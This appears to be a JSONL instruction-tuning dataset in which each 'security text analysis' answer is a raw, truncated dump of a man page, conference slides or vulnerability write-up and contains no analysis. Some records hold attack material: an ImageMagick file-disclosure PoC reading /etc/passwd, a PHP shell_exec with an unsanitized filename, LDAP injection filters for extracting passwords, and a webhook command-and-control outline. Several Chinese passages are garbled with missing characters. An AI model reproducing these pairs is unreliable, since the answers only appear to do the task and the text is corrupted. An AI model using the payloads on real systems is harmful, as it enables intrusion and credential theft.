{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH AC 1 \"1995 October 31\" .SH NAME ac \\ - 输出用户连接时间 .SH 总览 .hy 0 .na .TP .B ac [ .B \\-d | .B \\-\\-daily-totals ] [ .B \\-y | .B \\-\\-print-year ] .br [ .B \\-p | .B \\-\\-individual-totals ] [ .I people ] .br [ .B \\-f | .B \\-\\-file .I filename ] [ .B \\-a | .B \\-\\-all-days ] .br [ .B \\-\\-complain ] [ .B \\-\\-reboots ] [ .B \\-\\-supplants ] .br [ .B \\-\\-timewarps ] [ .B \\-\\-compatibility ] .br [ .B \\-\\-tw-leniency .I num ] [ .B \\-\\-tw-suspicious .I num ] .br [ .B \\-z | .B \\-\\-print-zeros ] [ .B \\-\\-debug ] .br [ .B \\-V | .B \\-\\-version ] [ .B \\-h | .B \\-\\-help ] .ad b .hy 1 .SH 描述 基于当前的 /var/log/wtmp 文件中的登录和退出时间输出一个 关于连接时间(以小时为单位)的报告并且还输出一个总计时间 审计文件 /var/log/wtmp 由 init(8) 和 login(1) 维护ac 和 login 均不生成 /var/log/wtmp 文件如果审计文件不存在则不 做审计工作如果要开始审计应生成一个长度为零的审计文件 注意文件 /var/log/wtmp 可能很快就变得非常大你可能隔一段 时间就要裁减一下这个文件 GNU ac 工作起来与 u*x ac 基本一样但也在几个方面有小的改进 你可能希望看到 GNU ac 和其他系统上的 ac 在输出上的不同想得 到额外的信息请使用命令 info accounting .fi .SH 选项 .TP .B \\-d, \\-\\-daily-totals 为每天输出输出一个总计时间而不是在结尾输出一大的总计输出 可能象下面这样 Jul 3 total 1.17 Jul 4 total 2.10 Jul 5 total 8.23 Jul 6 total 2.10 Jul 7 total 0.30 .TP .B \\-p, \\-\\-individual-totals 为每个用户输出总计时间并在最后追加一个所有用户的总计时间的 累计值输出可能象下面这样 bob 8.06 goff 0.60 maley 7.37 root 0.12 total 16.15 .TP .I [用户列表] 输出的是在用户列表中包括的所有用户的连接时间的总计和值 用户列表由空格分隔其中不允许有通配符 .TP .BI \"\\-f, \\-\\-file \" filename 从指定文件而不是系统的 /var/log/wtmp 文件中读取记帐信息 .TP .B \\-\\-complain .nf 当 /var/log/wtmp 存在着问题(时间扭曲丢失记录 或其他任何问题)输出一个适当的错误信息 .fi .TP .B \\-\\-reboots .nf 重新引导(reboot)记录不是在系统重新引导时写的而是 在系统重新启动(restart)时写的所以不可能知道重新引导 的精确的发生时间用户在系统重新引导时可能已经在系统 上登录了许多 ac 依据用户(的要求)自动的统计在登录与重 新引导记录之间的时间(尽管所有的这些时间不应是问题但 系统关机很长的时间时可能就是了)如果你打算统计这个时 间就应包括此选项 *要求对 vanilla ac 的兼容性就要包含此选项* .fi .TP .B \\-\\-supplants .nf 有时注销记录没有写出明确的终端因而 最近的用户的自然增长的时间就不能被计算如果你打算 包括在一个终端上的从用户登录到下一次登录的时间(尽管 可能是不正确的)就应包括此选项 *要求对 vanilla ac 的兼容性就要包含此选项* .fi .TP .B \\-\\-timewarps .nf 一些时候在 @WTMP_FILE_LOC 文件中的记录可能突然跳回 到了以前的时间而却没有时钟更改记录出现在这种情况 发生时不可能知道用户登录了多长时间如果你打算依据 用户(的要求)统计从登录到时间扭曲之间的时间就应包括 此选项 *要求对 vanilla ac 的兼容性就要包含此选项* .fi .TP .B \\-\\-compatibility 这是上面三种选项的速写就不用敲三", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH TIMEOUT 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 timeout \\- 在规定时限内运行一个命令 .SH 概述 \\fBtimeout\\fP [\\fI\\,选项列表\\/\\fP] \\fI\\,持续时间 命令 \\/\\fP[\\fI\\,参数列表\\/\\fP]... .br \\fBtimeout\\fP [\\fI\\,选项列表\\/\\fP] .SH 描述 .\\\" Add any additional description here .PP 运行所给命令如果它超过指定时间后仍在运行则杀死其进程 .PP 必选参数对长短选项同时适用 .HP \\fB\\-\\-preserve\\-status\\fP .IP 将退出状态值设为与所运行指令的退出状态相同的值即使 .IP 指令运行超时 .HP \\fB\\-\\-foreground\\fP .IP 当不是直接在 shell 命令提示符下运行 timeout 的情况下使用 .IP 允许所运行命令直接由 TTY 读取数据并且接收 TTY 的信号在这种模式下所运行命令的子进程将不会被 timeout 的超时控制所考虑 .HP \\fB\\-k\\fP, \\fB\\-\\-kill\\-after\\fP=\\fI\\,持续时间\\/\\fP .IP 如果初始信号已发出且再次等待了指定时间之后 .IP 所运行命令仍在运行则发出 KILL 信号 .HP \\fB\\-s\\fP, \\fB\\-\\-signal\\fP=\\fI\\,信号\\/\\fP .IP 指定超时发生时应当送出的信号 .IP 信号可以是类似HUP的信号名或是信号数从kill \\fB\\-l\\fP的输出可获得信号的列表 .TP \\fB\\-v\\fP, \\fB\\-\\-verbose\\fP 对任何超时后发送的信号向标准错误输出诊断信息 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 持续时间应当是一个浮点数后缀是可选的\\&s表示秒默认值m表示分钟h表示小时或者使用d表示天数若持续时间为 0将禁用所关联的超时配置 .PP 超时以后如果没有指定其他信号则向给定命令发送 TERM 信号TERM 信号将杀死没有阻塞或捕获该信号的进程有时可能需要使用 KILL 信号因为此信号无法被捕获 .SS 退出状态 .TP 124 如果指定命令超时且未指定 \\fB\\-\\-preserve\\-status\\fP 选项 .TP 125 如果 timeout 命令本身执行失败 .TP 126 如果找到了命令但无法执行 .TP 127 如果未找到命令 .TP 137 如果命令或 timeout 命令本身收到了 KILL (9) 信号即 128+9 .TP \\- 其他情况下退出状态是命令的退出状态 .SH 缺陷 某些平台目前不支持将超时时间设置为超过 2038 年 .SH 作者 由 Padraig Brady 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. .SH 参见 \\fBkill\\fP(1) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/ti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJoe Grand aka The Projects of... DEFCON 17 Zoz aka  Engineering entertainment program on Discovery Channel  Four guys building prototypes of crazy things  Try to follow the \"true\" design process  Premiered October 2008 (US), ~February 2009 (World)  Thirteen episodes  ~1 million households/episode  www.discovery.com/prototypethis Prototype This! electrical engineer. hardware hacker. daddy. Joe Grand robotics. software programming. mad scientist. mit. Zoz Brooks materials scientist. mechanical engineer. ucsb. Mike North special effects. machinist. fabricator. Terry Sandin joe andreas. kevin binkert. steve lassovsky. flaming lotus girls. nemo gould. diana coopersmith. many, many more. Friends We built stuff like this... We built stuff like this... We built stuff like this... With not a lot of this... (Contrary to popular belief...) Challenges  TV is nothing like how it really happens in real life  Don't believe the hype  Most producers/editors/execs were not technical and didn't care to be  Were only interested in the final result  Did not understand the complexity of the tasks  Assumed everything was easy  Wanted unrealistic projects that had never been done before built in two weeks or less  Ex.: X-ray glasses, personal force field  How to make engineering sexy? Traffic Busting Truck  Omnidirectional Wheels  Autonomous Parking  Drive/Park Over Traffic  ~4 weeks Traffic Busting Truck  BASIC Stamp 2p40  RF Keyfob  Wireless PS2 Controller for manual couch/truck control  Solenoid/Hydraulic Valve control via MOSFET  DS1867 Digital Potentiometers for Joystick Emulation for omnidirectional wheel control  Serial port I/F to communicate w/ Zoz's autonomous control S/W Traffic Busting Truck  IR, US: single range  Stereo: 640x480 RGBD map  IR: detect suitable gaps between parked cars  Stereo: parallel alignment of vehicle at parking distance  Ultrasonic: curb detection for park slide completion Traffic Busting Truck Sensors Parallax PING))) ultrasonic rangefinder Sharp GP2 infrared rang", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefCON 27, Pedro Cabrera SDR Against Smart TVs; URL and channel injection attacks DefCON 27, Pedro Cabrera @PCabreraCamara DefCON 27, Pedro Cabrera Industrial engineer, UAV professional pilot, Radio Ham (EA4HCF) Ethon Shield, Founder 2018 RSA: Parrot Drones Hijacking 2017 BH Asia Trainings (+ Simon Roses): Attacking 2G/3G mobile networks, smartphones and apps RogueBTS, IMSICatchers, FakeStations: www.fakebts.com @PCabreraCamara About Me DefCON 27, Pedro Cabrera This.Presentation: I. HbbTV 101. Digital TV introduction II. Hacking TV & HbbTV. III. HbbTV RX stations. IV. Targeting the Smart TV browser. V. Conclusions DefCON 27, Pedro Cabrera [I] Hybrid Broadcast Broadband Televison HbbTV (2009) H4TV project HTML profit project Hybrid television because it merges digital television content and web content. The HbbTV specification extends DVB-T by introducing additional metadata formats that mix broadband Internet content into the digital television channel. SPA ENG DefCON 27, Pedro Cabrera [I] TV Distribution Network Generic TV Network DefCON 27, Pedro Cabrera [I] DVB-T DVB-T characteristics (Spain):  8 MHz bandwidth  Transmission mode: 8k (6,817 carriers).  Modulation schemes: 64 Quadrature Amplitude Modulation (OFDM)  Code Rate for internal error protection: 2/3.  Length of guard interval: 1/4. DefCON 27, Pedro Cabrera [I] DVB-T DVB-T characteristics (Spain):  8 MHz bandwidth  Transmission mode: 8k (6,817 carriers).  Modulation schemes: 64 Quadrature Amplitude Modulation (OFDM)  Code Rate for internal error protection: 2/3.  Length of guard interval: 1/4. DefCON 27, Pedro Cabrera [I] Generic DVB-T receiver Radio Frequency MPEG-2 Multiplex DeModulator DeMultiplexer Video Decoder Audio Decoder Metadata Decoder DVB-T Tuner RTL-SDR: Rafael 820T2 RTL-SDR: Realtek RTL2832u DefCON 27, Pedro Cabrera [I] DVB-T demodulator MPEG-2 MUX Radio Frequency RadioFreq Receiver ADC Synchronizer Fast Fourier Transformer Channel Estimator & Channel Equalizer Inner Deinterleaver Viterbi Dec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ImageMagick Arbitrary File Disclosure (CVE-2022-44268) [中文版本(Chinese version)](README.zh-cn.md) ImageMagick is a free and open-source cross-platform software suite for displaying, creating, converting, modifying, and editing raster images. In the version prior to 7.1.0-51 on ImageMagick, there is a information disclosure vulnerability that is able to be used to read arbitrary file when modifing a PNG file. References: - <https://www.metabaseq.com/imagemagick-zero-days/> - <https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#710-52---2022-11-06> ## Vulnerable Environment Execute folloiwing command to start a Web server that uses the ImageMagick to convert an old image to a 50x50 size new image: ``` docker compose up -d ``` After the server is started, visit `http://your-ip:8080` you will see an upload file button: ![](1.png) The [backend service](index.php) is as simple as the following lines of code: ```php $newname = uniqid() . '.png'; shell_exec(\"convert -resize 50x50 {$_FILES['file_upload']['tmp_name']} ./{$newname}\"); ``` ## Exploit To exploit this issue, you have to prepare a craft PNG file that contains a chunk data with the file path that you want to disclose. Use [poc.py](poc.py) to generate it: ``` ./poc.py generate -o poc.png -r /etc/passwd ``` > Install [PyPNG](https://pypng.readthedocs.io/en/latest/) to execute poc.py properly: `pip install pypng` There is a type of `tEXt` chunk that contains our payload `profile=/etc/passwd` if you use [010editor](https://en.wikipedia.org/wiki/010_Editor) to review this file: ![](2.png) Then, upload this file to target server: ![](3.png) Download the output artifact as out.png, use poc.py to extract all the chunks from it: ``` ./poc.py parse -i out.png ``` ![](4.png) As you can see, `/etc/passwd` is read and the result have been written to output file by ImageMagick.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nState of the Hack: Maltego Use Cases Over the past several years, data has quickly gone from being sparsely collected to hoarded in mounds, locked away in datacenters and spread across the world. Is there really a need to store so much information? That question has yet to be answered, but with advances in modern technology, it is relatively cheap to store every byte just in case it is needed later. Like other industries that collect data, the information security and threat intelligence industries are no exception. The issue with large stores of data comes in making sense of it all. How does one sift through terabytes of domains, IP addresses, malware strings, assembly code and netflows to find the one indicator driving the next attack? In this week's State of the Hack article, iDefense will cover a process best described as visual data analytics, which is a way to visualize data during analysis to find what data is most critical. Problem Highlight Security analysts often observe attacks as they are happening or shortly after they have occurred. It is up to analysts to identify the who and why of an attack based on the indicators collected. These indicators not only range in type but also in confidence level, as analysts collect and store some indicators based on tangential relationships. To provide the best possible intelligence, data collected from each malicious file, attack, public database and threat feed is stored in a single database that makes connections between the data. At present, databases holding indicator information hold upward of billions of records. When analysts quickly assemble all of the information about an attack and its related infrastructure, it becomes difficult to find the most meaningful data when querying data collections this large. Assume for a moment that a query is fast and an analyst is able to obtain the results he or she requested. Even in some cases, results come back with thousands of related indicators that may or may not be r", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAtlassian Confluence简称Confluence是个专业的wiki程序它是个知识管理的具通过它 可以实现团队成员之间的协作和知识共享本次漏洞为 Ognl 表达式注攻击者可未授权通过 Ognl 表达式在服务器上执任意代码 影响版本 version < 6.13.23 6.14.0  version < 7.4.11 7.5.0  version < 7.11.5 7.12.0  version < 7.12.5 环境搭建 执下载的 bin 件后选择动安装并指定安装路径和服务运端口安装完成后执 /atlassian/jira/atlassian-jira-8132/jira/bin/start-jira.sh 件即可启动服务在 /atlassian/confluence7123/confluence/bin/catalina.sh 件开头添加如下语句即可开启 Debug 模式 这选择 mysql 数据库安装的时候需要先先创建数据库并设置 tx_isolation='READ- COMMITTED' 下载 mysql-connector-java-5.1.48.jar 并放置 /atlassian/confluence7123/confluence/confluence/WEB-INF/lib/ 录下 补丁选择 CATALINA_OPTS=\"- agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9999\" mysql> create database fluence7123 CHARACTER SET utf8 COLLATE utf8_bin; mysql> SET GLOBAL tx_isolation='READ-COMMITTED'; 先来看下 官漏洞描述 这注意到官说了本次漏洞为 Ognl 表达式注CVE 编号为 CVE-2021- 26084 7.12.x 的修复版本为 7.12.5  那么在翻看通告下评论的时候发现这个漏洞之前在 7.12.4 版本就修复过次CVE 编号为 CVE- 2021-26077 个猜测之前的修复代码可能存在绕过这为了避免修复代码的扰选择 7.12.3 完全没修复和 7.12.5 完全修这两个版本进代码差异对 补丁分析 继续翻看信息会发现官还出了 离线补丁 内容致如下看了下概补丁基本上是字符串匹配 替换修改的都是 .vm 后缀的件 在安装好 7.12.37.12.5 两个版本后先 find 命令找到 .vm 件所在的录 然后使 diff 命令对录下的所有件可以看到修复式基本上就是把 $ 符号给去掉 .vm 后缀的件般是 velocity 模板件$action 则是 velocity 上下中的个变量般在进 模板渲染前会设置到 context 这的 $action 则是当前访问路由对应的具体 Action 类 $action.backupPath 则表取 Action 类的 backupPath 属性值 寻找路由 这我们选择第处模板 /admin/editdailybackupsettings.vm 来分析先我们得先找到这个模 板对应的 action 通过路径名我们可以猜测该功能是管理员才有的类似编辑备份设置的功能这 也确实在后台找到了这功能但是这功能默认不开启按照 官档 开启即可 点击编辑并抓包数据包致如下 我们使 grep -Rni editdailybackupsettings 命令全局搜索看下这个路由是否配置在某个件 不过在执该命令之前我们需要先将所有的 jar 件解压因为有些时候些配置件会放置 在 jar 包grep 命令是法精确搜索 jar 的字符串很快我们便发现 confluence- 7.12.3.jar!/xwork.xml 件配置了不同请求对应的具体模板直接在件中搜 /admin/editdailybackupsettings.vm 命中的有3条 按照配置件我们可以清晰的看到路由与模板的关系假设我们访问 /admin/editdailybackupsettings.action 那么程序将会调 com.atlassian.confluence.admin.actions.DailyBackupAdminAction#doDefault() 法如果 该法执完返回 success 那么就由 /admin/editdailybackupsettings.vm 模板渲染结果所 以 $action.backupPath 对应的就是 DailyBackupAdminAction#backupPath 属性 那我们怎么给 backupPath 属性赋值呢我们去看 DailyBackupAdminAction", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 记次src测试中的ldap注的深利 ldap注点判断 ldap的注简单利 获取ldap中的密码 修复法 在最近的次的src测试中遇到了个ldap注漏洞,标是个管理平台,漏洞点存在于户名判断处.在 测试时遇到的 ldap注是指ldap过滤器语句(filter)的注 ldap过滤器的基本语法如下 例如个简单的查询语句如下 搜索cn值属性为admin的条 成功会返回完整条属性 实际使时可能会较复杂 如说同时搜索匹配户输的户名/邮箱/机号 ldap注点判断 PHP 复制代码 = >= <= | 或 & 与 !  * 通配符 (语句) 1 2 3 4 5 6 7 8 PHP 复制代码 (cn=admin) 1 2 ldap条常的属性值 在判断注点的时候可以插半个括号 多余的未闭合的括号会使ldap查询出错 观察返回是否出现异常 即可判断注点 也可以直接输*(星号) 通配符观察返回是否为户存在但密码错误 或者是服务器错误(ldap查询可以同 时返回多条结果 如果查询结果不唯 后端未做好处理可能会报错) ldap注常于在判断户名是否存在的点 很少出现在户名密码同时判断的地 经过盲测发现标可能的登陆逻辑如下 PHP 复制代码 (|(cn=admin)(mail=admin)(mobile=admin)) 1 PHP 复制代码 cn (Common Name 通名称) 常被做户名 Surname 姓 mobile 机号 mail 邮箱 1 2 3 4 3 ldap通常构造通配符查询 控制返回的结果 实现布尔注从带出ldap中储存的数据 如ldap中存在个admin的户名 查询的注点为cn 那么可以使*匹配先猜测出户名 (cn=a*) 返回密码错误 (cn=b*) 返回户名不存在 只要判断为密码错误即为匹配成功 ldap的注简单利 PHP 复制代码 $ds=ldap_connect($ldapSrv,$port);//建ldap连接 if($ds) { $r=ldap_bind($ds, \"cn=\".$username.\",\".$dn, $passwd);/绑定ldap区域(相当于 登陆ldap服务器) 使域管户登陆 检索户列表 if($r) { $sr=ldap_search($ds, $dn, \"(user=\".$_GET[\"user\"].\")\");//在ldap中使 过滤器搜索户名 $info = ldap_get_entries($ds, $sr); if($info[\"count\"]==0){ die('户不存在'); } ldap_close($ds); $ds=ldap_connect($ldapSrv,$port);//建ldap连接 $bd = ldap_bind($conn, $_GET[\"user\"], $passwd); // 绑定ldap区域(相 当于登陆ldap服务器) 以普通户登陆 判断是否登陆成功 if ($bd) { echo '登陆成功'; } else { echo '密码错误'; } ldap_close($ds); } else { echo \"Unable to connect to LDAP server.\"; } } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 4 构造语句猜测admin户的机号 (cn=admin)(mobile=13*) 到这已经可以跑出ldap中保存的些敏感信息(机号 邮箱 户名) 但是这造成的影响还是不太够 个注就只能拿到这么少的数据 作为于户鉴权场景的ldap当然是要拿到户的密码 登陆后台 查阅档 户的密码储存在 userPassword属性 尝试构造查询 (cn=admin)(userPassword=a*) 多次尝试发现都法匹配记录. 但是直接使*可以匹配成功 既然密码是个属性为什么使*号不能匹配部分字符串呢? 经过查阅ldap rfc4519档 发现userPassword属性类型不是常规的字符串,是(Octet String 字节序列) *通配符只能匹配字符串 那么怎么匹配字节序列呢 通过阅读ldapwiki发现过滤器除了可以使常规的运算符外,还有种特殊的匹配规则(MatchingRule) 其中有两个专匹配Octet String的规则 octetStringMatch octetStringOrderingMatch 第个规则在完全匹配时才会返回真,这显然不能利. 在 rfc4517 找到了octetStringOrderingMatch规则的详细介绍 获取ldap中的密码 PHP 复制代码 构造脚本递归匹配字符 (cn=a*) (cn=ad*) (cn=adm*) (cn=admi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 5. 生成器Builder ### Intent 封装一个对象的构造过程并允许按步骤构造 ### Class Diagram <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/db5e376d-0b3e-490e-a43a-3231914b6668.png\"/> </div><br> ### Implementation 以下是一个简易的 StringBuilder 实现参考了 JDK 1.8 源码 ```java public class AbstractStringBuilder { protected char[] value; protected int count; public AbstractStringBuilder(int capacity) { count = 0; value = new char[capacity]; } public AbstractStringBuilder append(char c) { ensureCapacityInternal(count + 1); value[count++] = c; return this; } private void ensureCapacityInternal(int minimumCapacity) { // overflow-conscious code if (minimumCapacity - value.length > 0) expandCapacity(minimumCapacity); } void expandCapacity(int minimumCapacity) { int newCapacity = value.length * 2 + 2; if (newCapacity - minimumCapacity < 0) newCapacity = minimumCapacity; if (newCapacity < 0) { if (minimumCapacity < 0) // overflow throw new OutOfMemoryError(); newCapacity = Integer.MAX_VALUE; } value = Arrays.copyOf(value, newCapacity); } } ``` ```java public class StringBuilder extends AbstractStringBuilder { public StringBuilder() { super(16); } @Override public String toString() { // Create a copy, don't share the array return new String(value, 0, count); } } ``` ```java public class Client { public static void main(String[] args) { StringBuilder sb = new StringBuilder(); final int count = 26; for (int i = 0; i < count; i++) { sb.append((char) ('a' + i)); } System.out.println(sb.toString()); } } ``` ```html abcdefghijklmnopqrstuvwxyz ``` ### JDK - [java.lang.StringBuilder](http://docs.oracle.com/javase/8/docs/api/java/lang/StringBuilder.html) - [java.nio.ByteBuffer](http://docs.oracle.com/javase/8/docs/api/java/nio/ByteBuffer.html#put-byte-) - [java.lang.StringBuffer](http://docs.oracle.com/javase/8/docs/api/java/lang/StringBuffer.html#append-boolean-) - [java.lang.Appendable](http://docs.oracle.com/javase/8/docs/api/java/lang/Appendable.html) - [Apache Camel builders](htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPwn the Pwn Plug: Analyzing and Counter-Attacking Attacker-Implanted Devices Wesley McGrew Assistant Research Professor Mississippi State University Center for Computer Security Research McGrew Security wesley@mcgrewsecurity.com Introduction Wesley McGrew Breaking things, RE, forensics, etc. Finally finished dissertation - Ph.D. Assistant Research Professor Mississippi State University NSA CAE Cyber Operations McGrewSecurity.com @McGrewSecurity Attacker-Implantable Devices Attacker-Implantable Devices Malicious attackers/Penetration testers How can you respond to one found in your organization? Whatre the implications of vulnerabilities in attack software/ hardware? Response Identification: Network/Physical Found one! Response  Seizure, imaging, forensication  What info/systems has it compromised?  Attribution  Challenge: Procedures for embedded devices  Counter-attack  Offline & modify vs. attack in place  Monitor the attacker - Attribution/Motive  Turn it into a honeypot Pwning Pentesters Implantable device: Send it in to to do an internal test from comforts of home Nerdy James Bond physical pentest payload Re-used from test to test, client to client (Not leaving it there, that things expensive!) Do you wipe it? (do you know how?) Pwning Pentesters Put on your black hat. Hacking a pentesters implantable device: In the field On the bench All sorts of benefits... Implications of Pwning Pentesters Intercept: Let them do the work for you Modify/Filter: Keep some of the results for yourself Camouflage: Make your own attacks appear part of the test Competitive Intel: Steal all the 0day Gift that Keeps Giving: Do it again and again as tester reuses device between clients Difficulties Securing Implanted Attack Devices  By definition, out of your physical control  Small/weird platforms  Update procedure  Underlying attack software - Software Engineering Practices  Did it work? Push a release, move on  Proof of Concept code  Huge attack surface Security geeks can be easy targets A", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecuring the Tor Network Mike Perry Riverbed Technology Black Hat USA 2007 Defcon 2007 Who am I?  Volunteer Tor developer  Forward+Reverse engineer  Employed by Riverbed (shameless plug)  Leading manufacturer of WAN accelerators  20200X (not percent. X) improvement of CIFS  550X improvement of MAPI/Exchange  Protocol independent data reduction  > 90% head to head win rate  Outselling Cisco accelerators 2:1 Preaching to the Choir  Don't yet understand consequences of having lives+thoughts archived by IP, bought and sold  Google may not be (that) evil, but what about ISPs, other search engines?  Information can come back to bite in unexpected ways  Divorce cases  Lawsuits  Catalogs/Spam What is Tor?  Volunteer run relay network designed for privacy, anonymity, and censorship resistance.  Client acts as SOCKS proxy  Relays TCP connections (streams)  Multiplexed on encrypted paths (circuits)  Circuits multiplexed over nodetonode TLS/SSL  Circuits route through 3 nodes  Guard, relay, exit Tor Routing Classes of Attack  Passive attacks  Packet and connection timing correlation  Fingerprinting of traffic/usage patterns  Intersection Attacks of multiple attributes of users  Active attacks  Lying about bandwidth to get more traffic  Failing circuits to bias node selection  Modifying application layer traffic at exit Position of Attack  Internal  Node operator  Can differentiate circuits at guard and relay.  Able to differentiate streams per circuit at exit  External  ISP or Echelonstyle adversary  Assumed to be unable to see inside TLS streams  Likely frustrated to a large degree by running Tor as both node and client Attack Points Passive Attacks Active Attacks Application Attacks Questions/Intermission 1 Questions so far? Approaches to Security  Verify node operators (Ha!)  Path selection hacks  Tor up from the floor up  Improve network speed and usability  Scan nodes for modification/reliability  Secure the applications (different threat model) Path Selection Hacks  /16 h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKey Decoding and Duplication Attacks for the Schlage Primus High-Security Lock David Lawrence Eric Van Albert Robert Johnson locks@mit.edu DEF CON 21 August 3, 2013 dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 1 / 31 Standard pin-tumbler locks Photo credit: user pbroks13 on Wikimedia Commons. Licensed under GFDL or CC-BY-SA-3.0. Vulnerabilities 1 Key duplication: get copies made in any hardware store. 2 Manipulation: susceptible to picking, impressioning, etc. dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 2 / 31 The Schlage Primus Based on a pin-tumbler lock, but with a second independent locking mechanism. Manipulation is possible but extremely difficult. Some people can pick these in under a minute. Most people cannot. We will focus on key duplication and the implications thereof. dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 3 / 31 1 Reverse-engineering the Primus 2 3D modeling Primus keys 3 Fabricating Primus keys 4 What it all means dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 4 / 31 1 Reverse-engineering the Primus 2 3D modeling Primus keys 3 Fabricating Primus keys 4 What it all means dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 5 / 31 Security through patents dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 6 / 31 Look up the patent. . . dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 7 / 31 Primus service manual w3.securitytechnologies.com/IRSTDocs/Manual/108482.pdf (and many other online sources) dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 8 / 31 Sidebar operation DO N O T DU P L I C A T E P AT .NO .4,756,177 PRIMUS Finger pins must be lifted to the correct height. Finger pins must be rotated to the correct angle. dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 9 / 31 Disassemb", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# No Padding, No Problem Category: Crypto, 90 points ## Description > Oracles can be your best friend, they will decrypt anything, except the flag's ciphertext. How will you break it? ## Solution Let's connect to the attached server: ```console (user@kali)-[/media/sf_CTFs/pico/No_Padding_No_Problem] $ nc mercury.picoctf.net 30048 Welcome to the Padding Oracle Challenge This oracle will take anything you give it and decrypt using RSA. It will not accept the ciphertext with the secret message... Good Luck! n: 51257263015582188197648371474129549390905726426257438448153816359702362365658508334422660676137191608574589301862860723036048910648313371474365316649888203989162930646519011433136231329260451213231902920703710354241532734042339059649207865410951756937740333312020743615116676965217774179610963694893894058993 e: 65537 ciphertext: 4630900525813217788908324506108030714601444705261980401094718094759603138876572869225585464832937171107712654868912146981974620187638194979958086597403998901460677636640013168017847942623819676132193036153903064536382635689292213133256195449181769142311263486211152780709880862212814932262615707105931438936 Give me ciphertext to decrypt: ``` We get some RSA values and the ability to decrypt any ciphertext... Except for the provided ciphertext, that is: ``` Give me ciphertext to decrypt: 4630900525813217788908324506108030714601444705261980401094718094759603138876572869225585464832937171107712654868912146981974620187638194979958086597403998901460677636640013168017847942623819676132193036153903064536382635689292213133256195449181769142311263486211152780709880862212814932262615707105931438936 Will not decrypt the ciphertext. Try Again ``` Now, unpadded RSA is [homomorphic](https://en.wikipedia.org/wiki/Homomorphic_encryption), which means that: ``` encrypt(m1) * encrypt(m2) = ((m1**e) * (m2**e)) mod n = (m1 * m2)**e mod n = encrypt(m1 * m2) ``` So, we can take a known value such as `2`, and encrypt it by performing `2**e mod n`. ```python >>> n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Web Hooks For Command And Control Dimitry Snezhkov @Op_nomad What we are going to talk about Subject: Safe(er) bidirectional delivery of content and communication across network boundaries with the use of WebHook technology. From: - Hostile networks - Monitored networks - Censored networks - Restricted networks To: - External Hosts under your control. (C&C servers) Purpose: - External Content Retrieval - Internal Content Exfiltration - Shell Execution on External and Internal Hosts Audience Offense  Red Teamers  Pen Testers Defense  DF/IR folks  Sysadmins  Developers  Privacy Advocates  Anyone interested in covert communication Dimitry Snezhkov Opinions expressed are solely my own and do not express the views or opinions of my employer or its products. What I do: - Offensive Testing - Code Hacking - Tool Hacking - Other security work Watson> Are you sure?.. About Meet Defense at their map of the world.  Seek alternative means of effective outbound communication through content proxies.  Maximize adaptive retooling capability for exfiltration.  Minimize discoverability of outbound communication in environments  Use opportunities in targeted environment to overcome restrictions. Context: Strategic Goals  Achieve asynchronous or realtime-asynchronous communication between hostile network and external server under your control.  Attempt to achieve reverse connectivity to hostile networks from external server under your control  Avoid existing detection mechanisms, elevating OpSec capability.  Attempt to avoid censorship in communicating to safe external server under your control. Context: Tactical Goals Technical Mechanisms  Discover HTTP WebHooks concept.  Use WebHooks to Achieve 